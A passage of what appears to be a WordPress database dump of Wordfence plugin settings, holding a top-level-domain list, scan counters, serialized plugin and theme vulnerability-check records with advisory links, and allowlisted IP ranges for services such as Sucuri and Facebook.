taipei|grocery|unicom|android|tattoo|compare|target|company|taobao|viva|vivo|gratis|lexus|volvo|garden|global|legal|voto|lease|vote|george|giving|kyoto|corsica|juegos|lamer|lefrak|london|vodka|shouji|coupons|viajes|viking|villas|vision|voting|voyage|country|courses|lancia|latino|lawyer|living|locker|mobile|soccer|social|tennis|virgin|wine|zappos|agakhan|charity|college|cologne|comcast|airforce|chintai|citadel|clubmed|cooking|cruises|digital|domains|exposed|express|genting|godaddy|americanexpress|americanfamily|cricket|guitars|hermes|itau|hiphop|hitachi|irish|watch|weber|hockey|holiday|hotels|hughes|info|jaguar|java|nissan|nissay|oracle|pfizer|photos|physio|pictet|webcam|weibo|hamburg|hosting|afamilycompany|intuit|wiki|health|wien|imamat|insure|mormon|weir|hangout|norton|nowruz|office|olayan|online|orange|otsuka|toyota|travel|hoteles|jeep|jetzt|monster|amsterdam|juniper|lanxess|lasalle|latrobe|analytics|hyundai|jobs|leclerc|limited|lincoln|apartments|joburg|moscow|wales|museum|racing|tienda|xihuan|yandex|hotmail|ismaili|aquarelle|quebec|wang|nagoya|jewelry|natura|kitchen|mutual|markets|netflix|network|oldnavy|philips|tjmaxx|komatsu|okinawa|politie|tkmaxx|yachts|netbank|pioneer|walter|lacaixa|organic|origins|vuelos|neustar|realtor|shell|boutique|bradesco|broadway|budapest|builders|business|capetown|catering|walmart|catholic|christmas|cipriani|computer|capitalone|shiksha|wanggou|cityeats|cleaning|clinique|clothing|commbank|democrat|diamonds|discount|community|discover|download|engineer|calvinklein|directory|engineering|enterprises|ericsson|equipment|construction|delivery|deloitte|consulting|creditcard|cuisinella|contractors|creditunion|cookingchannel|theatre|tickets|toshiba|trading|watches|cancerresearch|tiffany|weather|brussels|windows|winners|xfinity|yamaxun|youtube|zuerich|etisalat|whoswho|exchange|wedding|feedback|frontier|goodyear|website|fidelity|firmdale|grainger|graphics|guardian|firestone|football|frontdoor|furniture|hdfcbank|goldpoint|foundation|fresenius|foodnetwork|helsinki|eurovision|extraspace|fairwinds|healthcare|holdings|financial|ipiranga|homedepot|homegoods|homesense|hospital|insurance|immobilien|industries|infiniti|hisamitsu|institute|investments|international|istanbul|macys|rmit|bnpparibas|rent|bloomberg|reise|reit|rest|rich|room|rsvp|rehab|ruhr|safe|ricoh|sale|rocks|rodeo|rugby|blackfriday|blockbuster|reisen|salon|sarl|save|saxo|boehringer|repair|jpmorgan|kerryhotels|kerrylogistics|realty|report|review|rogers|school|recipes|safety|sakura|rentals|sener|rocher|reviews|rexroth|ryukyu|seven|samsung|sexy|sharp|shaw|select|singles|staples|storage|support|surgery|saarland|temasek|samsclub|sandvik|sanofi|schmidt|systems|schaeffler|schule|realestate|schwarz|science|services|shopping|showtime|softbank|software|scjohnson|sandvikcoromant|scot|search|seat|secure|security|seek|shangrila|solutions|stcgroup|statebank|statefarm|stockholm|scholarships|kerryproperties|theater|lighting|lundbeck|marriott|maserati|mckinsey|memorial|kuokgroup|marketing|marshalls|merckmsd|mortgage|observer|melbourne|partners|property|yokohama|lancaster|lifestyle|xn--90ae|landrover|pharmacy|pictures|plumbing|reliance|microsoft|passagens|supplies|xn--l1acc|nextdirect|panasonic|redstone|xn--90ais|xn--c1avg|xn--node|mitsubishi|olayangroup|photography|pramerica|xn--ngbrx|xn--nqv7f|yodobashi|management|properties|xn--d1alf|xn--qxam|republican|restaurant|tatamotors|xn--e1a4c|prudential|richardli|xn--fhbei|xn--p1acf|xn--tckwe|xn--vhquv|protection|xn--p1ai|xn--qxa6a|swiftcover|technology|training|ventures|vacations|vanguard|vlaanderen|woodside|bridgestone|productions|university|verisign|travelers|volkswagen|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--wgbh1c|lamborghini|motorcycles|playstation|progressive|xn--unup4y|redumbrella|williamhill|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--pssy2u|xn--q7ce6a|xn--3bst00m|xn--3ds443g|xn--3hcrj9c|xn--3pxu8k|xn--o3cw4h|xn--42c2d9a|xn--mxtq1m|xn--wgbl6a|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--9et52u|xn--czrs0t|xn--kput3i|xn--55qw42g|xn--55qx5d|xn--5tzm5g|xn--6frz82g|xn--80ao21a|xn--80aswg|xn--90a3ac|xn--9dbq2a|xn--9krt00a|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--czr694b|xn--czru2d|xn--d1acj3b|xn--efvy88h|xn--fjq720a|xn--flw351e|xn--g2xx48c|xn--y9a3aq|xn--fct429k|xn--gecrj9c|xn--jvr189m|xn--45br5cyl|xn--4dbrk0ce|xn--80adxhks|xn--80asehdb|xn--8y0a063a|xn--gckr3f0f|xn--gk3at1e|xn--rhqv96g|xn--rovu88b|xn--3e0b707e|xn--xhq521b|travelchannel|wolterskluwer|xn--s9brj9c|xn--ses554g|lplfinancial|xn--qcka1pmc|xn--t60b56a|versicherung|lifeinsurance|xn--vuq861b|xn--w4rs40l|xn--cckwcxetd|xn--zfr164b|weatherchannel|xn--80aqecdr1a|xn--eckvdtc9d|northwesternmutual|xn--fiq228c5hs|xn--fpcrj9c3d|travelersinsurance|xn--3oq18vl8pn36a|xn--fzc2c9e2c|xn--54b7fta0cc|xn--6qq986b3xl|xn--b4w605ferd|xn--fzys8d69uvgm|xn--tiq49xqyj|xn--ygbi2ammx|xn--bck1b9a5dre4c|xn--h2brj9c|xn--clchc0ea0b2g2a9gcd|xn--q9jyb4c|xn--yfro4i67o|xn--h2breg3eve|xn--h2brj9c8c|xn--io0a7i|xn--hxt814e|xn--j1aef|xn--j1amh|xn--imr513n|xn--j6w193g|xn--kprw13d|xn--kpry57d|xn--mgbbh1a|xn--mgb9awbf|xn--jlq480n2rg|xn--mgba3a3ejt|xn--lgbbat1ad8j|xn--mgbpl2fh|xn--jlq61u9w7b|xn--mgbayh7gpa|xn--mgbbh1a71e|xn--mgbca7dzdo|xn--mgba3a4f16a|xn--mgbab2bd|xn--mgbaam7a8h|xn--mgbaakc7dvf|xn--mgbah1a3hjkrd|xn--mgbai9azgqp6j|xn--mgbc0a9azcg|xn--mgba7c0bbn0a|xn--mgbgu82a|xn--mgbcpq6gpa1a|xn--mgbt3dhd|xn--mgberp4a5d4ar|xn--ngbc5azd|xn--kcrx77d1x4a|xn--mgbtx2b|xn--i1b6b1a6a2e|xn--mix891f|xn--nyqy26a|xn--otu796d|xn--mk1bu44c|xn--mgbi4ecexp|xn--ngbe9e0a|xn--mgbx4cd0ab|xn--nqv7fs00ema|xn--ogbpf8fl|xn--pgbs0dh|xn--rvc1e0am3e|xn--5su34j936bgsg|xn--w4r85el8fhu5dnra|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|','yes'),('tldlistHash','3694aa48ec18a722435a817d284b52e282d032d11ca43c36e94d9e03b5ca922a','yes'),('total503s','398','yes'),('totalAlertsSent','2','yes'),('totalIPsBlocked','397','yes'),('totalIPsLocked','2','yes'),('totalLoginHits','1597','yes'),('totalScansRun','5','yes'),('touppBypassNextCheck','0','yes'),('touppPromptNeeded','1','yes'),('vulnerabilities_plugin','a:18:{i:0;a:5:{s:4:\"slug\";s:7:\"akismet\";s:9:\"toVersion\";s:5:\"4.1.9\";s:11:\"fromVersion\";s:5:\"4.1.8\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:1;a:5:{s:4:\"slug\";s:23:\"all-in-one-wp-migration\";s:9:\"toVersion\";s:4:\"7.44\";s:11:\"fromVersion\";s:4:\"7.37\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:2;a:5:{s:4:\"slug\";s:14:\"contact-form-7\";s:9:\"toVersion\";s:5:\"5.4.1\";s:11:\"fromVersion\";s:3:\"4.5\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:73:\"https://wpvulndb.com/vulnerabilities/7391118e-eef5-4ff8-a8ea-f6b65f442c63\";}i:3;a:5:{s:4:\"slug\";s:22:\"contact-form-7-modules\";s:9:\"toVersion\";s:5:\"2.0.2\";s:11:\"fromVersion\";s:3:\"2.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:4;a:5:{s:4:\"slug\";s:22:\"contact-form-7-modules\";s:9:\"toVersion\";s:5:\"2.0.2\";s:11:\"fromVersion\";s:3:\"2.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:5;a:5:{s:4:\"slug\";s:11:\"hello-dolly\";s:9:\"toVersion\";s:5:\"1.7.2\";s:11:\"fromVersion\";s:3:\"1.6\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:6;a:5:{s:4:\"slug\";s:14:\"login-lockdown\";s:9:\"toVersion\";s:6:\"v1.8.1\";s:11:\"fromVersion\";s:6:\"v1.6.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:7;a:5:{s:4:\"slug\";s:26:\"universal-google-analytics\";s:9:\"toVersion\";s:5:\"1.3.7\";s:11:\"fromVersion\";s:7:\"1.2.5.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:8;a:5:{s:4:\"slug\";s:6:\"unyson\";s:9:\"toVersion\";s:6:\"2.7.24\";s:11:\"fromVersion\";s:6:\"2.5.12\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:73:\"https://wpvulndb.com/vulnerabilities/bb12460a-af03-4462-bd05-42248cd3dc0e\";}i:9;a:5:{s:4:\"slug\";s:15:\"wp-date-remover\";s:9:\"toVersion\";s:5:\"1.1.3\";s:11:\"fromVersion\";s:5:\"1.0.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:10;a:5:{s:4:\"slug\";s:13:\"wordpress-seo\";s:9:\"toVersion\";s:4:\"16.5\";s:11:\"fromVersion\";s:3:\"3.5\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:73:\"https://wpvulndb.com/vulnerabilities/41e0aa47-f2f6-4f64-a95e-ed5c884bfe9e\";}i:11;a:4:{s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:11:\"fromVersion\";s:5:\"4.4.8\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:12;a:4:{s:4:\"slug\";s:23:\"contact-form-7-designer\";s:11:\"fromVersion\";s:3:\"1.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:13;a:4:{s:4:\"slug\";s:12:\"spam-captcha\";s:11:\"fromVersion\";s:5:\"1.4.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:14;a:4:{s:4:\"slug\";s:9:\"wordfence\";s:11:\"fromVersion\";s:5:\"7.5.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:15;a:4:{s:4:\"slug\";s:9:\"wp-cerber\";s:11:\"fromVersion\";s:5:\"8.8.5\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:16;a:4:{s:4:\"slug\";s:11:\"dw-megamenu\";s:11:\"fromVersion\";s:5:\"1.0.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:17;a:4:{s:4:\"slug\";s:15:\"dw-social-share\";s:11:\"fromVersion\";s:5:\"1.0.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}}','yes'),('vulnerabilities_theme','a:26:{i:0;a:4:{s:4:\"slug\";s:10:\"accelerate\";s:9:\"toVersion\";s:5:\"1.4.9\";s:11:\"fromVersion\";s:5:\"1.2.6\";s:10:\"vulnerable\";b:0;}i:1;a:4:{s:4:\"slug\";s:11:\"alpha-store\";s:9:\"toVersion\";s:5:\"1.4.3\";s:11:\"fromVersion\";s:5:\"1.2.7\";s:10:\"vulnerable\";b:0;}i:2;a:4:{s:4:\"slug\";s:8:\"aqueduct\";s:9:\"toVersion\";s:5:\"2.0.3\";s:11:\"fromVersion\";s:5:\"2.0.2\";s:10:\"vulnerable\";b:0;}i:3;a:4:{s:4:\"slug\";s:8:\"barletta\";s:9:\"toVersion\";s:5:\"1.1.7\";s:11:\"fromVersion\";s:5:\"1.1.1\";s:10:\"vulnerable\";b:0;}i:4;a:4:{s:4:\"slug\";s:14:\"clean-magazine\";s:9:\"toVersion\";s:5:\"1.7.4\";s:11:\"fromVersion\";s:5:\"1.5.1\";s:10:\"vulnerable\";b:0;}i:5;a:4:{s:4:\"slug\";s:14:\"fabulous-fluid\";s:9:\"toVersion\";s:3:\"1.9\";s:11:\"fromVersion\";s:3:\"1.2\";s:10:\"vulnerable\";b:0;}i:6;a:4:{s:4:\"slug\";s:6:\"fluida\";s:9:\"toVersion\";s:7:\"1.8.6.2\";s:11:\"fromVersion\";s:5:\"1.2.4\";s:10:\"vulnerable\";b:0;}i:7;a:4:{s:4:\"slug\";s:6:\"hueman\";s:9:\"toVersion\";s:5:\"3.7.8\";s:11:\"fromVersion\";s:6:\"3.2.10\";s:10:\"vulnerable\";b:1;}i:8;a:4:{s:4:\"slug\";s:5:\"illdy\";s:9:\"toVersion\";s:5:\"2.1.9\";s:11:\"fromVersion\";s:6:\"1.0.35\";s:10:\"vulnerable\";b:0;}i:9;a:4:{s:4:\"slug\";s:7:\"lightly\";s:9:\"toVersion\";s:4:\"1.29\";s:11:\"fromVersion\";s:4:\"1.26\";s:10:\"vulnerable\";b:0;}i:10;a:4:{s:4:\"slug\";s:16:\"mh-magazine-lite\";s:9:\"toVersion\";s:5:\"2.9.0\";s:11:\"fromVersion\";s:5:\"2.5.5\";s:10:\"vulnerable\";b:0;}i:11;a:4:{s:4:\"slug\";s:6:\"morfeu\";s:9:\"toVersion\";s:5:\"1.1.4\";s:11:\"fromVersion\";s:5:\"1.1.3\";s:10:\"vulnerable\";b:0;}i:12;a:4:{s:4:\"slug\";s:7:\"nirvana\";s:9:\"toVersion\";s:5:\"1.5.2\";s:11:\"fromVersion\";s:5:\"1.3.2\";s:10:\"vulnerable\";b:0;}i:13;a:4:{s:4:\"slug\";s:9:\"panoramic\";s:9:\"toVersion\";s:6:\"1.1.15\";s:11:\"fromVersion\";s:6:\"1.0.19\";s:10:\"vulnerable\";b:0;}i:14;a:4:{s:4:\"slug\";s:5:\"point\";s:9:\"toVersion\";s:5:\"2.1.1\";s:11:\"fromVersion\";s:5:\"2.0.3\";s:10:\"vulnerable\";b:0;}i:15;a:4:{s:4:\"slug\";s:13:\"precious-lite\";s:9:\"toVersion\";s:5:\"1.3.2\";s:11:\"fromVersion\";s:5:\"1.2.6\";s:10:\"vulnerable\";b:0;}i:16;a:4:{s:4:\"slug\";s:5:\"relia\";s:9:\"toVersion\";s:5:\"1.2.0\";s:11:\"fromVersion\";s:5:\"1.0.7\";s:10:\"vulnerable\";b:0;}i:17;a:4:{s:4:\"slug\";s:9:\"sg-window\";s:9:\"toVersion\";s:5:\"1.2.3\";s:11:\"fromVersion\";s:5:\"1.2.1\";s:10:\"vulnerable\";b:0;}i:18;a:4:{s:4:\"slug\";s:6:\"square\";s:9:\"toVersion\";s:5:\"1.8.7\";s:11:\"fromVersion\";s:5:\"1.3.2\";s:10:\"vulnerable\";b:0;}i:19;a:4:{s:4:\"slug\";s:9:\"supernews\";s:9:\"toVersion\";s:5:\"3.0.3\";s:11:\"fromVersion\";s:5:\"1.0.6\";s:10:\"vulnerable\";b:0;}i:20;a:4:{s:4:\"slug\";s:11:\"the-minimal\";s:9:\"toVersion\";s:5:\"1.2.4\";s:11:\"fromVersion\";s:5:\"1.1.2\";s:10:\"vulnerable\";b:0;}i:21;a:4:{s:4:\"slug\";s:7:\"tortuga\";s:9:\"toVersion\";s:5:\"2.3.1\";s:11:\"fromVersion\";s:5:\"1.1.4\";s:10:\"vulnerable\";b:0;}i:22;a:4:{s:4:\"slug\";s:9:\"travelify\";s:9:\"toVersion\";s:5:\"3.0.8\";s:11:\"fromVersion\";s:5:\"3.0.4\";s:10:\"vulnerable\";b:0;}i:23;a:4:{s:4:\"slug\";s:4:\"vega\";s:9:\"toVersion\";s:5:\"3.0.0\";s:11:\"fromVersion\";s:5:\"1.9.5\";s:10:\"vulnerable\";b:0;}i:24;a:4:{s:4:\"slug\";s:7:\"verbosa\";s:9:\"toVersion\";s:7:\"1.2.1.1\";s:11:\"fromVersion\";s:5:\"0.9.6\";s:10:\"vulnerable\";b:0;}i:25;a:4:{s:4:\"slug\";s:12:\"wen-business\";s:9:\"toVersion\";s:5:\"1.7.2\";s:11:\"fromVersion\";s:5:\"1.4.1\";s:10:\"vulnerable\";b:0;}}','yes'),('wafAlertInterval','600','yes'),('wafAlertOnAttacks','1','yes'),('wafAlertThreshold','100','yes'),('wafAlertWhitelist','','yes'),('waf_status','learning-mode','yes'),('wfKillRequested','0','no'),('wfPeakMemory','12582912','no'),('wfScanStartVersion','5.6.4','yes'),('wfsd_engine','','no'),('wfStatusStartMsgs','a:2:{i:0;s:0:\"\";i:1;s:0:\"\";}','yes'),('wf_scanLastStatusTime','0','yes'),('wf_scanRunning','','yes'),('wf_summaryItems','a:8:{s:12:\"scannedPosts\";i:0;s:15:\"scannedComments\";i:0;s:12:\"scannedFiles\";i:0;s:14:\"scannedPlugins\";i:0;s:13:\"scannedThemes\";i:0;s:12:\"scannedUsers\";i:0;s:11:\"scannedURLs\";i:0;s:10:\"lastUpdate\";i:1624620600;}','yes'),('whitelisted','','yes'),('whitelistedServices','{}','yes'),('whitelistHash','bf3d76dc05caf8623cb3fe01c1fc9e308e2f2ea37b826937d850fde361cdefd4','yes'),('whitelistPresets','{\"wordfence\":{\"n\":\"Wordfence\",\"h\":true,\"d\":true,\"f\":true,\"r\":[\"54.68.32.247\",\"69.46.36.0\\/27\",\"2605:2400:0104:0100::\\/56\"]},\"sucuri\":{\"n\":\"Sucuri\",\"d\":true,\"r\":[\"97.74.127.171\",\"69.164.203.172\",\"173.230.128.135\",\"66.228.34.49\",\"66.228.40.185\",\"50.116.36.92\",\"50.116.36.93\",\"50.116.3.171\",\"198.58.96.212\",\"50.116.63.221\",\"192.155.92.112\",\"192.81.128.31\",\"198.58.106.244\",\"192.155.95.139\",\"23.239.9.227\",\"198.58.112.103\",\"192.155.94.43\",\"162.216.16.33\",\"173.255.233.124\",\"173.255.233.124\",\"192.155.90.179\",\"50.116.41.217\",\"192.81.129.227\",\"198.58.111.80\",\"162.216.19.183\"]},\"facebook\":{\"n\":\"Facebook\",\"d\":true,\"r\":[\"69.63.176.0\\/20\",\"66.220.144.0\\/20\",\"66.220.144.0\\/21\",\"69.63.184.0\\/21\",\"69.63.176.0\\/21\",\"74.119.76.0\\/22\",\"69.171.255.0\\/24\",\"173.252.64.0\\/18\",\"69.171.224.0\\/19\",\"69.171.224.0\\/20\",\"103.4.96.0\\/22\",\"69.63.176.0\\/24\",\"173.252.64.0\\/19\",\"173.252.70.0\\/24\",\"31.13.64.0\\/18\",\"31.13.24.0\\/21\",\"66.220.152.0\\/21\",\"66.220.159.0\\/24\",\"69.171.239.0\\/24\",\"69.171.240.0\\/20\",\"31.13.64.0\\/19\",\"31.13.64.0\\/24\",\"31.13.65.0\\/24\",\"31.13.67.0\\/24\",\"31.13.68.0\\/24\",\"31.13.69.0\\/24\",\"31.13.70.0\\/24\",\"31.13.71.0\\/24\",\"31.13.72.0\\/24\",\"31.13.73.0\\/24\",\"31.13.74.0\\/24\",\"31.13.75.0\\/24\",\"31.13.76.0\\/24\",\"31.13.77.0\\/24\",\"31.13.96.0\\/19\",\"31.13.66.0\\/24\",\"173.252.96.0\\/19\",\"69.63.178.0\\/24\",\"31.13.78.0\\/24\",\"31.13.79.0\\/24\",\"31.13.80.0\\/24\",\"31.13.82.0\\/24\",\"31.13.83.0\\/24\",\"31.13.84.0\\/24\",\"31.13.85.0\\/24\",\"31.13.86.0\\/24\",\"31.13.87.0\\/24\",\"31.13.88.0\\/24\",\"31.13.89.0\\/24\",\"31.13.90.0\\/24\",\"31.13.91.0\\/24\",\"31.13.92.0\\/24\",\"31.13.93.0\\/24\",\"31.13.94.0\\/24\",\"31.13.95.0\\/24\",\"69.171.253.0\\/24\",\"69.63.186.0\\/24\",\"31.13.81.0\\/24\",\"179.60.192.0\\/22\",\"179.60.192.0\\/24\",\"179.60.193.0\\/24\",\"179.60.194.0\\/24\",\"179.60.195.0\\/24\",\"185.60.216.0\\/22\",\"45.64.40.0\\/22\",\"185.60.216.0\\/24\",\"185.60.217.0\\/24\",\"185.60.218.0\\/24\",\"185.60.219.0\\/24\",\"129.134.0.0\\/16\",\"157.240.0.0\\/16\",\"157.240.8.0\\/24\",\"157.240.0.0\\/24\",\"157.240.1.0\\/24\",\"157.240.2.0\\/24\",\"157.240.3.0\\/24\",\"157.240.4.0\\/24\",\"157.240.5.0\\/24\",\"157.240.6.0\\/24\",\"157.240.7.0\\/24\",\"157.240.9.0\\/24\",\"157.240.10.0\\/24\",\"157.240.16.0\\/24\",\"157.240.19.0\\/24\",\"157.240.11.0\\/24\",\"157.240.12.0\\/24\",\"157.240.13.0\\/24\",\"157.240.14.0\\/24\",\"157.240.15.0\\/24\",\"157.240.17.0\\/24\",\"157.240.18.0\\/24\",\"157.240.20.0\\/24\",\"157.240.21.0\\/24\",\"157.240.22.0\\/24\",\"157.240.23.0\\/24\",\"157.240.0.0\\/17\",\"69.171.250.0\\/24\",\"157.240.24.0\\/24\",\"157.240.25.0\\/24\",\"199.201.64.0\\/24\",\"199.201.65.0\\/24\",\"199.201.64.0\\/22\",\"204.15.20.0\\/22\",\"157.240.192.0\\/24\",\"129.134.0.0\\/17\",\"204.15.20.0\\/22\",\"69.63.176.0\\/20\",\"69.63.176.0\\/21\",\"69.63.184.0\\/21\",\"66.220.144.0\\/20\",\"69.63.176.0\\/20\",\"2620:0:1c00::\\/40\",\"2a03:2880::\\/32\",\"2a03:2880:fffe::\\/48\",\"2a03:2880:ffff::\\/48\",\"2620:0:1cff::\\/48\",\"2a03:2880:f000::\\/48\",\"2a03:2880:f001::\\/48\",\"2a03:2880:f002::\\/48\",\"2a03:2880:f003::\\/48\",\"2a03:2880:f004::\\/48\",\"2a03:2880:f005::\\/48\",\"2a03:2880:f006::\\/48\",\"2a03:2880:f007::\\/48\",\"2a03:2880:f008::\\/48\",\"2a03:2880:f009::\\/48\",\"2a03:2880:f00a::\\/48\",\"2a03:2880:f00b::\\/48\",\"2a03:2880:f00c::\\/48\",\"2a03:2880:f00d::\\/48\",\"2a03:2880:f00e::\\/48\",\"2a03:2880:f00f::\\/48\",\"2a03:2880:f010::\\/48\",\"2a03:2880:f011::\\/48\",\"2a03:2880:f012::\\/48\",\"2a03:2880:f013::\\/48\",\"2a03:2880:f014::\\/48\",\"2a03:2880:f015::\\/48\",\"2a03:2880:f016::\\/48\",\"2a03:2880:f017::\\/48\",\"2a03:2880:f018::\\/48\",\"2a03:2880:f019::\\/48\",\"2a03:2880:f01a::\\/48\",\"2a03:2880:f01b::\\/48\",\"2a03:2880:f01c::\\/48\",\"2a03:2880:f01d::\\/48\",\"2a03:2880:f01e::\\/48\",\"2a03:2880:f01f::\\/48\",\"2a03:2880:1000::\\/36\",\"2a03:2880:2000::\\/36\",\"2a03:2880:3000::\\/36\",\"2a03:2880:4000::\\/36\",\"2a03:2880:5000::\\/36\",\"2a03:2880:6000::\\/36\",\"2a03:2880:7000::\\/36\",\"2a03:2880:f020::\\/48\",\"2a03:2880:f021::\\/48\",\"2a03:2880:f022::\\/48\",\"2a03:2880:f023::\\/48\",\"2a03:2880:f024::\\/48\",\"2a03:2880:f025::\\/48\",\"2a03:2880:f026::\\/48\",\"2a03:2880:f027::\\/48\",\"2a03:2880:f028::\\/48\",\"2a03:2880:f029::\\/48\",\"2a03:2880:f02b::\\/48\",\"2a03:2880:f02c::\\/48\",\"2a03:2880:f02d::\\/48\",\"2a03:2880:f02e::\\/48\",\"2a03:2880:f02f::\\/48\",\"2a03:2880:f030::\\/48\",\"2a03:2880:f031::\\/48\",\"2a03:2880:f032::\\/48\",\"2a03:2880:f033::\\/48\",\"2a03:2880:f034::\\/48\",\"2a03:2880:f035::\\/48\",\"2a03:2880:f036::\\/48\",\"2a03:2880:f037::\\/48\",\"2a03:2880:f038::\\/48\",\"2a03:2880:f039::\\/48\",\"2a03:2880:f03a::\\/48\",\"2a03:2880:f03b::\\/48\",\"2a03:2880:f03c::\\/48\",\"2a03:2880:f03d::\\/48\",\"2a03:2880:f03e::\\/48\",\"2a03:2880:f03f::\\/48\",\"2401:db00::\\/32\",\"2a03:2880::\\/36\",\"2803:6080::\\/32\",\"2a03:2880:f100::\\/48\",\"2a03:2880:f200::\\/48\",\"2a03:2880:f101::\\/48\",\"2a03:2880:f201::\\/48\",\"2a03:2880:f102::\\/48\",\"2a03:2880:f202::\\/48\",\"2a03:2880:f103::\\/48\",\"2a03:2880:f203::\\/48\",\"2a03:2880:f104::\\/48\",\"2a03:2880:f204::\\/48\",\"2a03:2880:f107::\\/48\",\"2a03:2880:f207::\\/48\",\"2a03:2880:f108::\\/48\",\"2a03:2880:f208::\\/48\",\"2a03:2880:f109::\\/48\",\"2a03:2880:f209::\\/48\",\"2a03:2880:f10a::\\/48\",\"2a03:2880:f20a::\\/48\",\"2a03:2880:f10b::\\/48\",\"2a03:2880:f20b::\\/48\",\"2a03:2880:f10d::\\/48\",\"2a03:2880:f20d::\\/48\",\"2a03:2880:f10e::\\/48\",\"2a03:2880:f20e::\\/48\",\"2a03:2880:f10f::\\/48\",\"2a03:2880:f20f::\\/48\",\"2a03:2880:f110::\\/48\",\"2a03:2880:f210::\\/48\",\"2a03:2880:f111::\\/48\",\"2a03:2880:f211::\\/48\",\"2a03:2880:f112::\\/48\",\"2a03:2880:f212::\\/48\",\"2a03:2880:f114::\\/48\",\"2a03:2880:f214::\\/48\",\"2a03:2880:f115::\\/48\",\"2a03:2880:f215::\\/48\",\"2a03:2880:f116::\\/48\",\"2a03:2880:f216::\\/48\",\"2a03:2880:f117::\\/48\",\"2a03:2880:f217::\\/48\",\"2a03:2880:f118::\\/48\",\"2a03:2880:f218::\\/48\",\"2a03:2880:f119::\\/48\",\"2a03:2880:f219::\\/48\",\"2a03:2880:f11a::\\/48\",\"2a03:2880:f21a::\\/48\",\"2a03:2880:f11f::\\/48\",\"2a03:2880:f21f::\\/48\",\"2a03:2880:f121::\\/48\",\"2a03:2880:f221::\\/48\",\"2a03:2880:f122::\\/48\",\"2a03:2880:f222::\\/48\",\"2a03:2880:f123::\\/48\",\"2a03:2880:f223::\\/48\",\"2a03:2880:f10c::\\/48\",\"2a03:2880:f20c::\\/48\",\"2a03:2880:f126::\\/48\",\"2a03:2880:f226::\\/48\",\"2a03:2880:f105::\\/48\",\"2a03:2880:f205::\\/48\",\"2a03:2880:f125::\\/48\",\"2a03:2880:f225::\\/48\",\"2a03:2880:f106::\\/48\",\"2a03:2880:f206::\\/48\",\"2a03:2880:f11b::\\/48\",\"2a03:2880:f21b::\\/48\",\"2a03:2880:f113::\\/48\",\"2a03:2880:f213::\\/48\",\"2a03:2880:f11c::\\/48\",\"2a03:2880:f21c::\\/48\",\"2a03:2880:f128::\\/48\",\"2a03:2880:f228::\\/48\",\"2a03:2880:f02a::\\/48\",\"2a03:2880:f12a::\\/48\",\"2a03:2880:f22a::\\/48\",\"2a03:2880:f12f::\\/48\",\"2a03:2880:f22f::\\/48\",\"2a03:2880:f11d::\\/48\",\"2a03:2880:f11e::\\/48\",\"2a03:2880:f120::\\/48\",\"2a03:2880:f124::\\/48\",\"2a03:2880:f127::\\/48\",\"2a03:2880:f129::\\/48\",\"2a03:2880:f12b::\\/48\",\"2a03:2880:f12c::\\/48\",\"2a03:2880:f12d::\\/48\",\"2a03:2880:f12e::\\/48\",\"2a03:2880:f130::\\/48\",\"2a03:2880:f131::\\/48\",\"2a03:2880:f132::\\/48\",\"2a03:2880:f133::\\/48\",\"2a03:2880:f134::\\/48\",\"2a03:2880:f135::\\/48\",\"2a03:2880:f136::\\/48\",\"2a03:2880:f137::\\/48\",\"2a03:2880:f138::\\/48\",\"2a03:2880:f139::\\/48\",\"2a03:2880:f13a::\\/48\",\"2a03:2880:f13b::\\/48\",\"2a03:2880:f13c::\\/48\",\"2a03:2880:f13d::\\/48\",\"2a03:2880:f13e::\\/48\",\"2a03:2880:f13f::\\/48\",\"2a03:2880:f21d::\\/48\",\"2a03:2880:f21e::\\/48\",\"2a03:2880:f220::\\/48\",\"2a03:2880:f224::\\/48\",\"2a03:2880:f227::\\/48\",\"2a03:2880:f229::\\/48\",\"2a03:2880:f22b::\\/48\",\"2a03:2880:f22c::\\/48\",\"2a03:2880:f22d::\\/48\",\"2a03:2880:f22e::\\/48\",\"2a03:2880:f230::\\/48\",\"2a03:2880:f231::\\/48\",\"2a03:2880:f232::\\/48\",\"2a03:2880:f233::\\/48\",\"2a03:2880:f234::\\/48\",\"2a03:2880:f235::\\/48\",\"2a03:2880:f236::\\/48\",\"2a03:2880:f237::\\/48\",\"2a03:2880:f238::\\/48\",\"2a03:2880:f239::\\/48\",\"2a03:2880:f23a::\\/48\",\"2a03:2880:f23b::\\/48\",\"2a03:2880:f23c::\\/48\",\"2a03:2880:f23d::\\/48\",\"2a03:2880:f23e::\\/48\",\"2a03:2880:f23f::\\/48\",\"2a03:2880:f0ff::\\/48\",\"2a03:2880:f1ff::\\/48\",\"2a03:2880:f2ff::\\/48\",\"2c0f:ef78:0003::\\/48\"]},\"uptimerobot\":{\"n\":\"Uptime 